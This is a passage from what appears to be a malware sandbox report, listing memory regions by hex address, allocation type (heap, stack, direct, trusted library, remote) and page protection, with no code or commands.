page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2B339A38000
|
trusted library allocation
|
page read and write
|
||
|
2C04000
|
unkown
|
page read and write
|
||
|
2B350020000
|
heap
|
page execute and read and write
|
||
|
610000
|
unkown
|
page read and write
|
||
|
2B33613A000
|
heap
|
page read and write
|
||
|
2594000
|
heap
|
page read and write
|
||
|
24335000
|
heap
|
page read and write
|
||
|
3C1000
|
unkown
|
page execute read
|
||
|
1AAA32F0000
|
heap
|
page read and write
|
||
|
4C4F000
|
stack
|
page read and write
|
||
|
F10000
|
heap
|
page readonly
|
||
|
380000
|
unkown
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
764C000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
8C50000
|
direct allocation
|
page read and write
|
||
|
2425E000
|
stack
|
page read and write
|
||
|
47BE000
|
stack
|
page read and write
|
||
|
2BB0000
|
trusted library allocation
|
page read and write
|
||
|
7FF886F80000
|
trusted library allocation
|
page read and write
|
||
|
2BFB000
|
heap
|
page read and write
|
||
|
150841D0000
|
heap
|
page read and write
|
||
|
8A23000
|
heap
|
page read and write
|
||
|
75D1000
|
heap
|
page read and write
|
||
|
2B338551000
|
trusted library allocation
|
page read and write
|
||
|
8D98AFE000
|
stack
|
page read and write
|
||
|
320000
|
unkown
|
page readonly
|
||
|
7FF886F40000
|
trusted library allocation
|
page read and write
|
||
|
300000
|
unkown
|
page readonly
|
||
|
8A61000
|
heap
|
page read and write
|
||
|
3440000
|
heap
|
page read and write
|
||
|
2D39000
|
direct allocation
|
page execute and read and write
|
||
|
2B339BF3000
|
trusted library allocation
|
page read and write
|
||
|
610000
|
unkown
|
page read and write
|
||
|
6FB0000
|
direct allocation
|
page read and write
|
||
|
2534000
|
heap
|
page read and write
|
||
|
E50000
|
trusted library allocation
|
page read and write
|
||
|
2B34FEAC000
|
heap
|
page read and write
|
||
|
25CC000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
5D8000
|
unkown
|
page read and write
|
||
|
13893C10000
|
heap
|
page read and write
|
||
|
73A6000
|
heap
|
page read and write
|
||
|
562F000
|
stack
|
page read and write
|
||
|
2B347A0F000
|
trusted library allocation
|
page read and write
|
||
|
310000
|
unkown
|
page readonly
|
||
|
4AD0000
|
direct allocation
|
page read and write
|
||
|
15084305000
|
heap
|
page read and write
|
||
|
47E0000
|
trusted library allocation
|
page read and write
|
||
|
2B3399C3000
|
trusted library allocation
|
page read and write
|
||
|
7490000
|
trusted library allocation
|
page read and write
|
||
|
3B0000
|
unkown
|
page read and write
|
||
|
2B337E10000
|
trusted library allocation
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
7594000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2594000
|
heap
|
page read and write
|
||
|
8A03000
|
heap
|
page read and write
|
||
|
4C0E000
|
stack
|
page read and write
|
||
|
7CFA000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2D87000
|
heap
|
page read and write
|
||
|
15084300000
|
heap
|
page read and write
|
||
|
160000
|
unkown
|
page readonly
|
||
|
2881000
|
heap
|
page read and write
|
||
|
76E0000
|
trusted library allocation
|
page read and write
|
||
|
2B350550000
|
heap
|
page read and write
|
||
|
1AAA32DB000
|
heap
|
page read and write
|
||
|
3210000
|
heap
|
page read and write
|
||
|
EA995CA000
|
stack
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2C68000
|
heap
|
page read and write
|
||
|
3C1000
|
unkown
|
page execute read
|
||
|
2B339BEE000
|
trusted library allocation
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
15084310000
|
heap
|
page read and write
|
||
|
25BB000
|
heap
|
page read and write
|
||
|
1AAA32BC000
|
heap
|
page read and write
|
||
|
5B69000
|
trusted library allocation
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2B336095000
|
heap
|
page read and write
|
||
|
1AAA4FD2000
|
heap
|
page read and write
|
||
|
1AAA32F0000
|
heap
|
page read and write
|
||
|
EA989FE000
|
stack
|
page read and write
|
||
|
1AAA32F2000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
8160000
|
heap
|
page read and write
|
||
|
2B338530000
|
trusted library allocation
|
page read and write
|
||
|
2CA000
|
stack
|
page read and write
|
||
|
320000
|
unkown
|
page readonly
|
||
|
7FF886D20000
|
trusted library allocation
|
page read and write
|
||
|
76C0000
|
trusted library allocation
|
page read and write
|
||
|
742F000
|
heap
|
page read and write
|
||
|
1AAA32F4000
|
heap
|
page read and write
|
||
|
6FC000
|
stack
|
page read and write
|
||
|
7637000
|
heap
|
page read and write
|
||
|
23B70000
|
direct allocation
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
3C0000
|
unkown
|
page readonly
|
||
|
2881000
|
heap
|
page read and write
|
||
|
1BE53800000
|
trusted library allocation
|
page read and write
|
||
|
1BE535F0000
|
heap
|
page read and write
|
||
|
82D8000
|
heap
|
page read and write
|
||
|
8990000
|
direct allocation
|
page read and write
|
||
|
8C3F000
|
stack
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
89B0000
|
heap
|
page read and write
|
||
|
2B337F20000
|
trusted library allocation
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
E23000
|
trusted library allocation
|
page execute and read and write
|
||
|
31B0000
|
heap
|
page read and write
|
||
|
2A65000
|
heap
|
page read and write
|
||
|
2D85000
|
heap
|
page read and write
|
||
|
31A7000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
31B2000
|
heap
|
page read and write
|
||
|
3270000
|
heap
|
page read and write
|
||
|
8A1F000
|
heap
|
page read and write
|
||
|
3CE000
|
unkown
|
page readonly
|
||
|
1BE51E3F000
|
heap
|
page read and write
|
||
|
5B41000
|
trusted library allocation
|
page read and write
|
||
|
7710000
|
trusted library allocation
|
page read and write
|
||
|
8A05000
|
heap
|
page read and write
|
||
|
1AAA32F4000
|
heap
|
page read and write
|
||
|
7DF4C2FA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2B337F4E000
|
trusted library allocation
|
page read and write
|
||
|
7FF887060000
|
trusted library allocation
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2B3360DD000
|
heap
|
page read and write
|
||
|
810000
|
unkown
|
page readonly
|
||
|
7540000
|
heap
|
page execute and read and write
|
||
|
2C7A000
|
heap
|
page read and write
|
||
|
1BE51C49000
|
system
|
page execute and read and write
|
||
|
81FE000
|
stack
|
page read and write
|
||
|
87A0000
|
trusted library allocation
|
page read and write
|
||
|
EA984FE000
|
stack
|
page read and write
|
||
|
281C000
|
unkown
|
page read and write
|
||
|
1BE51E1A000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2B347D0C000
|
trusted library allocation
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
8750000
|
trusted library allocation
|
page read and write
|
||
|
1AAA32F4000
|
heap
|
page read and write
|
||
|
76B0000
|
trusted library allocation
|
page read and write
|
||
|
4DAE000
|
stack
|
page read and write
|
||
|
E24000
|
trusted library allocation
|
page read and write
|
||
|
2530000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
1AAA3278000
|
heap
|
page read and write
|
||
|
453F000
|
stack
|
page read and write
|
||
|
7FF886F02000
|
trusted library allocation
|
page read and write
|
||
|
23A0000
|
heap
|
page read and write
|
||
|
7FF886D7C000
|
trusted library allocation
|
page execute and read and write
|
||
|
380000
|
unkown
|
page read and write
|
||
|
2B350228000
|
heap
|
page read and write
|
||
|
1AAA4FD1000
|
heap
|
page read and write
|
||
|
26A3000
|
heap
|
page read and write
|
||
|
22C8000
|
system
|
page execute and read and write
|
||
|
73B1000
|
heap
|
page read and write
|
||
|
12264000
|
system
|
page read and write
|
||
|
76D0000
|
trusted library allocation
|
page read and write
|
||
|
AB0000
|
unkown
|
page readonly
|
||
|
7FF886EE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF887030000
|
trusted library allocation
|
page read and write
|
||
|
2B336030000
|
trusted library allocation
|
page read and write
|
||
|
25DA000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
4840000
|
heap
|
page read and write
|
||
|
2B347A01000
|
trusted library allocation
|
page read and write
|
||
|
AB0000
|
heap
|
page read and write
|
||
|
E55000
|
trusted library allocation
|
page execute and read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
1AAA32AA000
|
heap
|
page read and write
|
||
|
240000
|
unkown
|
page readonly
|
||
|
2B335F85000
|
heap
|
page read and write
|
||
|
2D3D000
|
direct allocation
|
page execute and read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
493F000
|
stack
|
page read and write
|
||
|
78AE000
|
stack
|
page read and write
|
||
|
80F7000
|
stack
|
page read and write
|
||
|
23B50000
|
direct allocation
|
page read and write
|
||
|
4B00000
|
direct allocation
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
7FF8870A0000
|
trusted library allocation
|
page read and write
|
||
|
2B335FC5000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
31FE000
|
stack
|
page read and write
|
||
|
2B337F7A000
|
trusted library allocation
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
76A0000
|
trusted library allocation
|
page read and write
|
||
|
7B0000
|
heap
|
page read and write
|
||
|
13895740000
|
heap
|
page read and write
|
||
|
2A50000
|
trusted library allocation
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
BA3CFF000
|
stack
|
page read and write
|
||
|
25BB000
|
heap
|
page read and write
|
||
|
8A26000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
30CB000
|
remote allocation
|
page execute and read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
3A0000
|
unkown
|
page read and write
|
||
|
287F000
|
stack
|
page read and write
|
||
|
3624000
|
unclassified section
|
page read and write
|
||
|
74D7000
|
trusted library allocation
|
page read and write
|
||
|
1BE53640000
|
heap
|
page read and write
|
||
|
2B35014C000
|
heap
|
page read and write
|
||
|
1AAA32F2000
|
heap
|
page read and write
|
||
|
D7BB000
|
direct allocation
|
page execute and read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
1AAA32AA000
|
heap
|
page read and write
|
||
|
2495D000
|
direct allocation
|
page execute and read and write
|
||
|
BCD000
|
stack
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
7A0000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
281C000
|
unkown
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
8C60000
|
direct allocation
|
page read and write
|
||
|
E80000
|
heap
|
page read and write
|
||
|
2406E000
|
stack
|
page read and write
|
||
|
E70000
|
trusted library allocation
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
75B4000
|
heap
|
page read and write
|
||
|
2B00000
|
trusted library allocation
|
page execute and read and write
|
||
|
7CFD000
|
heap
|
page read and write
|
||
|
6FC000
|
stack
|
page read and write
|
||
|
8A1F000
|
heap
|
page read and write
|
||
|
75FF000
|
heap
|
page read and write
|
||
|
7680000
|
trusted library allocation
|
page read and write
|
||
|
8C70000
|
direct allocation
|
page read and write
|
||
|
25C0000
|
heap
|
page read and write
|
||
|
8B0000
|
heap
|
page read and write
|
||
|
80CB000
|
remote allocation
|
page execute and read and write
|
||
|
4AE0000
|
direct allocation
|
page read and write
|
||
|
23F2E000
|
stack
|
page read and write
|
||
|
13893BF0000
|
heap
|
page read and write
|
||
|
3D7000
|
unkown
|
page readonly
|
||
|
3C1000
|
unkown
|
page execute read
|
||
|
73C1000
|
heap
|
page read and write
|
||
|
7C9E000
|
stack
|
page read and write
|
||
|
330000
|
heap
|
page read and write
|
||
|
7FF886FB0000
|
trusted library allocation
|
page read and write
|
||
|
759A000
|
heap
|
page read and write
|
||
|
249E0000
|
unclassified section
|
page execute and read and write
|
||
|
2B338569000
|
trusted library allocation
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
53CB000
|
stack
|
page read and write
|
||
|
23F6F000
|
stack
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
25CC000
|
heap
|
page read and write
|
||
|
2EDD000
|
direct allocation
|
page execute and read and write
|
||
|
2B337F39000
|
trusted library allocation
|
page read and write
|
||
|
2B33857D000
|
trusted library allocation
|
page read and write
|
||
|
2B338532000
|
trusted library allocation
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
3C0000
|
unkown
|
page readonly
|
||
|
C80000
|
heap
|
page read and write
|
||
|
D1C000
|
heap
|
page read and write
|
||
|
75FD000
|
heap
|
page read and write
|
||
|
7589000
|
heap
|
page read and write
|
||
|
1AAA32B9000
|
heap
|
page read and write
|
||
|
7000000
|
heap
|
page read and write
|
||
|
2DD0000
|
heap
|
page readonly
|
||
|
2881000
|
heap
|
page read and write
|
||
|
EA994CE000
|
stack
|
page read and write
|
||
|
7584000
|
heap
|
page read and write
|
||
|
19C75FB000
|
stack
|
page read and write
|
||
|
2B339C07000
|
trusted library allocation
|
page read and write
|
||
|
391000
|
unkown
|
page readonly
|
||
|
2881000
|
heap
|
page read and write
|
||
|
EA9847C000
|
stack
|
page read and write
|
||
|
1BE5380E000
|
trusted library allocation
|
page read and write
|
||
|
8A26000
|
heap
|
page read and write
|
||
|
13893C60000
|
heap
|
page read and write
|
||
|
498E000
|
stack
|
page read and write
|
||
|
1AAA333B000
|
heap
|
page read and write
|
||
|
8A26000
|
heap
|
page read and write
|
||
|
D21000
|
unkown
|
page readonly
|
||
|
3A0000
|
heap
|
page read and write
|
||
|
CC2000
|
heap
|
page read and write
|
||
|
3C0000
|
unkown
|
page readonly
|
||
|
29A8000
|
heap
|
page read and write
|
||
|
1AAA4FD0000
|
heap
|
page read and write
|
||
|
477E000
|
stack
|
page read and write
|
||
|
44CB000
|
remote allocation
|
page execute and read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
8C80000
|
heap
|
page read and write
|
||
|
1BE53810000
|
trusted library allocation
|
page read and write
|
||
|
1AAA32C4000
|
heap
|
page read and write
|
||
|
2B336040000
|
heap
|
page readonly
|
||
|
19C8DFE000
|
stack
|
page read and write
|
||
|
2534000
|
heap
|
page read and write
|
||
|
7FF887000000
|
trusted library allocation
|
page read and write
|
||
|
7670000
|
trusted library allocation
|
page read and write
|
||
|
2A3E000
|
stack
|
page read and write
|
||
|
268E000
|
heap
|
page read and write
|
||
|
1BE51C45000
|
system
|
page execute and read and write
|
||
|
8BFE000
|
stack
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
1BE53803000
|
trusted library allocation
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2402D000
|
stack
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
23B40000
|
direct allocation
|
page read and write
|
||
|
7500000
|
trusted library allocation
|
page read and write
|
||
|
1AAA32AA000
|
heap
|
page read and write
|
||
|
240EE000
|
stack
|
page read and write
|
||
|
31BE000
|
unkown
|
page read and write
|
||
|
2B337A01000
|
trusted library allocation
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
3079000
|
stack
|
page read and write
|
||
|
27BE000
|
stack
|
page read and write
|
||
|
338F000
|
stack
|
page read and write
|
||
|
2594000
|
heap
|
page read and write
|
||
|
81BE000
|
stack
|
page read and write
|
||
|
74D0000
|
trusted library allocation
|
page read and write
|
||
|
8A61000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
722E000
|
stack
|
page read and write
|
||
|
810000
|
unkown
|
page readonly
|
||
|
2881000
|
heap
|
page read and write
|
||
|
7FF886F90000
|
trusted library allocation
|
page read and write
|
||
|
13893C68000
|
heap
|
page read and write
|
||
|
7FF886F20000
|
trusted library allocation
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2B3399B0000
|
trusted library allocation
|
page read and write
|
||
|
24690000
|
direct allocation
|
page execute and read and write
|
||
|
7690000
|
trusted library allocation
|
page read and write
|
||
|
1BE53901000
|
trusted library allocation
|
page read and write
|
||
|
7700000
|
trusted library allocation
|
page read and write
|
||
|
150840C0000
|
heap
|
page read and write
|
||
|
391000
|
unkown
|
page readonly
|
||
|
8D98CFF000
|
stack
|
page read and write
|
||
|
310000
|
unkown
|
page readonly
|
||
|
37E000
|
unkown
|
page read and write
|
||
|
1CA000
|
stack
|
page read and write
|
||
|
24617000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
113B4FD000
|
stack
|
page read and write
|
||
|
6FA0000
|
direct allocation
|
page read and write
|
||
|
8220000
|
trusted library allocation
|
page read and write
|
||
|
2AAF000
|
stack
|
page read and write
|
||
|
3D5000
|
unkown
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2B33605D000
|
heap
|
page read and write
|
||
|
48FE000
|
stack
|
page read and write
|
||
|
1AAA32C9000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
22C0000
|
heap
|
page read and write
|
||
|
140000
|
unkown
|
page readonly
|
||
|
637000
|
heap
|
page read and write
|
||
|
8A0D000
|
heap
|
page read and write
|
||
|
BA3C7C000
|
stack
|
page read and write
|
||
|
1BE51E10000
|
heap
|
page read and write
|
||
|
321C000
|
heap
|
page read and write
|
||
|
22D8000
|
system
|
page execute and read and write
|
||
|
8A26000
|
heap
|
page read and write
|
||
|
EA9877B000
|
stack
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
150842D0000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
7FF886EC0000
|
trusted library allocation
|
page read and write
|
||
|
58FF000
|
unkown
|
page execute and read and write
|
||
|
13893E85000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
62CB000
|
remote allocation
|
page execute and read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
3D7000
|
unkown
|
page readonly
|
||
|
250000
|
unkown
|
page readonly
|
||
|
2B339937000
|
trusted library allocation
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2B34FF04000
|
heap
|
page read and write
|
||
|
7A0000
|
heap
|
page read and write
|
||
|
25B7000
|
heap
|
page read and write
|
||
|
2C28000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
24613000
|
heap
|
page read and write
|
||
|
2B337F2D000
|
trusted library allocation
|
page read and write
|
||
|
8A6A000
|
heap
|
page read and write
|
||
|
7FF887010000
|
trusted library allocation
|
page read and write
|
||
|
768F000
|
heap
|
page read and write
|
||
|
1AAA32AA000
|
heap
|
page read and write
|
||
|
2B347CFC000
|
trusted library allocation
|
page read and write
|
||
|
7FF886DDC000
|
trusted library allocation
|
page execute and read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2C00000
|
heap
|
page read and write
|
||
|
4739000
|
stack
|
page read and write
|
||
|
7FF886DD0000
|
trusted library allocation
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
BA3D7F000
|
stack
|
page read and write
|
||
|
265C000
|
unkown
|
page read and write
|
||
|
1AAA331F000
|
heap
|
page read and write
|
||
|
240000
|
unkown
|
page readonly
|
||
|
74B0000
|
trusted library allocation
|
page read and write
|
||
|
3275000
|
heap
|
page read and write
|
||
|
2B347CED000
|
trusted library allocation
|
page read and write
|
||
|
4D50000
|
heap
|
page read and write
|
||
|
24331000
|
heap
|
page read and write
|
||
|
19C7DFE000
|
stack
|
page read and write
|
||
|
8BBE000
|
stack
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
7EC000
|
stack
|
page read and write
|
||
|
1BE53650000
|
trusted library allocation
|
page read and write
|
||
|
2B3360E4000
|
heap
|
page read and write
|
||
|
7B0000
|
heap
|
page read and write
|
||
|
75EB000
|
heap
|
page read and write
|
||
|
87C0000
|
direct allocation
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
300000
|
unkown
|
page readonly
|
||
|
7FF886ED1000
|
trusted library allocation
|
page read and write
|
||
|
113B6FF000
|
stack
|
page read and write
|
||
|
4D4C000
|
stack
|
page read and write
|
||
|
25C6000
|
heap
|
page read and write
|
||
|
726E000
|
stack
|
page read and write
|
||
|
3160000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2CA000
|
stack
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
1AAA329E000
|
heap
|
page read and write
|
||
|
2B350182000
|
heap
|
page read and write
|
||
|
233A000
|
system
|
page execute and read and write
|
||
|
C8D000
|
heap
|
page read and write
|
||
|
75CC000
|
heap
|
page read and write
|
||
|
2B336098000
|
heap
|
page read and write
|
||
|
2432C000
|
stack
|
page read and write
|
||
|
2EE1000
|
direct allocation
|
page execute and read and write
|
||
|
4AB0000
|
direct allocation
|
page read and write
|
||
|
2B34FE9D000
|
heap
|
page read and write
|
||
|
EA9954D000
|
stack
|
page read and write
|
||
|
7FF886EF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
E4A000
|
trusted library allocation
|
page execute and read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
150841A0000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
24220000
|
remote allocation
|
page read and write
|
||
|
3130000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
3D5000
|
unkown
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2B35015C000
|
heap
|
page read and write
|
||
|
7D00000
|
heap
|
page read and write
|
||
|
7FF886E06000
|
trusted library allocation
|
page execute and read and write
|
||
|
3C0000
|
unkown
|
page readonly
|
||
|
2B337F63000
|
trusted library allocation
|
page read and write
|
||
|
56AC000
|
stack
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
239E000
|
stack
|
page read and write
|
||
|
2CC000
|
stack
|
page read and write
|
||
|
1AAA3385000
|
heap
|
page read and write
|
||
|
1BE53700000
|
trusted library allocation
|
page read and write
|
||
|
2980000
|
heap
|
page read and write
|
||
|
2B3360DF000
|
heap
|
page read and write
|
||
|
828F000
|
heap
|
page read and write
|
||
|
4B9B000
|
trusted library allocation
|
page read and write
|
||
|
1AAA3302000
|
heap
|
page read and write
|
||
|
41C0000
|
unkown
|
page execute and read and write
|
||
|
8210000
|
trusted library allocation
|
page read and write
|
||
|
2B338581000
|
trusted library allocation
|
page read and write
|
||
|
7390000
|
heap
|
page read and write
|
||
|
31A4000
|
heap
|
page read and write
|
||
|
8A61000
|
heap
|
page read and write
|
||
|
330000
|
heap
|
page read and write
|
||
|
2590000
|
heap
|
page read and write
|
||
|
1BE51CE0000
|
heap
|
page read and write
|
||
|
23ED0000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
1AAA3250000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
760E000
|
stack
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
320000
|
unkown
|
page readonly
|
||
|
8A5D000
|
heap
|
page read and write
|
||
|
2C6D000
|
heap
|
page read and write
|
||
|
5D5E000
|
stack
|
page read and write
|
||
|
23B0000
|
unkown
|
page readonly
|
||
|
826A000
|
heap
|
page read and write
|
||
|
90F0000
|
direct allocation
|
page execute and read and write
|
||
|
4AA0000
|
direct allocation
|
page read and write
|
||
|
2B350040000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
3ACB000
|
remote allocation
|
page execute and read and write
|
||
|
330000
|
heap
|
page read and write
|
||
|
1BE51E42000
|
heap
|
page read and write
|
||
|
1BE539C4000
|
trusted library allocation
|
page read and write
|
||
|
ECE000
|
stack
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
1AAA3324000
|
heap
|
page read and write
|
||
|
7414000
|
heap
|
page read and write
|
||
|
380000
|
unkown
|
page read and write
|
||
|
3168000
|
heap
|
page read and write
|
||
|
1AAA32CA000
|
heap
|
page read and write
|
||
|
3F0000
|
unkown
|
page readonly
|
||
|
990000
|
unkown
|
page readonly
|
||
|
1BE53900000
|
trusted library allocation
|
page read and write
|
||
|
D21000
|
unkown
|
page readonly
|
||
|
3CE000
|
unkown
|
page readonly
|
||
|
2B335F90000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
303B000
|
stack
|
page read and write
|
||
|
7FF886F50000
|
trusted library allocation
|
page read and write
|
||
|
76CB000
|
remote allocation
|
page execute and read and write
|
||
|
2594000
|
heap
|
page read and write
|
||
|
4E4F000
|
stack
|
page read and write
|
||
|
3CE000
|
unkown
|
page readonly
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2B3380A2000
|
trusted library allocation
|
page read and write
|
||
|
300000
|
unkown
|
page readonly
|
||
|
7FF886DD6000
|
trusted library allocation
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
23FAD000
|
stack
|
page read and write
|
||
|
2B336067000
|
heap
|
page read and write
|
||
|
8A61000
|
heap
|
page read and write
|
||
|
8A23000
|
heap
|
page read and write
|
||
|
5D9E000
|
stack
|
page read and write
|
||
|
2B34FEC3000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
24220000
|
remote allocation
|
page read and write
|
||
|
8250000
|
heap
|
page read and write
|
||
|
75F2000
|
heap
|
page read and write
|
||
|
25DE0000
|
unclassified section
|
page execute and read and write
|
||
|
89B7000
|
heap
|
page read and write
|
||
|
7CED000
|
heap
|
page read and write
|
||
|
2B3399EC000
|
trusted library allocation
|
page read and write
|
||
|
874C000
|
stack
|
page read and write
|
||
|
8170000
|
heap
|
page read and write
|
||
|
AA9000
|
heap
|
page read and write
|
||
|
2D60000
|
heap
|
page read and write
|
||
|
D04000
|
heap
|
page read and write
|
||
|
776C000
|
stack
|
page read and write
|
||
|
23C0000
|
unkown
|
page execute and read and write
|
||
|
2C20000
|
heap
|
page read and write
|
||
|
8A23000
|
heap
|
page read and write
|
||
|
8A5E000
|
heap
|
page read and write
|
||
|
E20000
|
trusted library allocation
|
page read and write
|
||
|
1AAA32A2000
|
heap
|
page read and write
|
||
|
1BE53650000
|
trusted library allocation
|
page read and write
|
||
|
6F90000
|
direct allocation
|
page read and write
|
||
|
7CF4000
|
heap
|
page read and write
|
||
|
8D993FB000
|
stack
|
page read and write
|
||
|
4830000
|
heap
|
page execute and read and write
|
||
|
868E000
|
stack
|
page read and write
|
||
|
8485000
|
trusted library allocation
|
page read and write
|
||
|
82A3000
|
heap
|
page read and write
|
||
|
2B339642000
|
trusted library allocation
|
page read and write
|
||
|
2920000
|
heap
|
page read and write
|
||
|
82A7000
|
heap
|
page read and write
|
||
|
2594000
|
heap
|
page read and write
|
||
|
3A5000
|
heap
|
page read and write
|
||
|
870D000
|
stack
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2A5D000
|
heap
|
page read and write
|
||
|
4680000
|
heap
|
page read and write
|
||
|
2880000
|
heap
|
page read and write
|
||
|
3D7000
|
unkown
|
page readonly
|
||
|
35EF000
|
stack
|
page read and write
|
||
|
7FF886F30000
|
trusted library allocation
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2B335FC0000
|
heap
|
page read and write
|
||
|
7FF887020000
|
trusted library allocation
|
page read and write
|
||
|
247B000
|
stack
|
page read and write
|
||
|
2B338F8E000
|
trusted library allocation
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
7FF886FA0000
|
trusted library allocation
|
page read and write
|
||
|
22D0000
|
unkown
|
page readonly
|
||
|
2B338190000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D22000
|
trusted library allocation
|
page read and write
|
||
|
4DEF000
|
stack
|
page read and write
|
||
|
75A3000
|
heap
|
page read and write
|
||
|
7FF886D3B000
|
trusted library allocation
|
page read and write
|
||
|
249D2000
|
direct allocation
|
page execute and read and write
|
||
|
2B3360B6000
|
heap
|
page read and write
|
||
|
7FF886F70000
|
trusted library allocation
|
page read and write
|
||
|
7FF887050000
|
trusted library allocation
|
page read and write
|
||
|
11C62000
|
system
|
page read and write
|
||
|
1AAA338E000
|
heap
|
page read and write
|
||
|
7611000
|
heap
|
page read and write
|
||
|
7670000
|
trusted library allocation
|
page read and write
|
||
|
13893BE0000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2DE0000
|
direct allocation
|
page read and write
|
||
|
8B7000
|
heap
|
page read and write
|
||
|
757F000
|
heap
|
page read and write
|
||
|
2D80000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2881000
|
heap
|
page read and write
|
||
|
2B33962E000
|
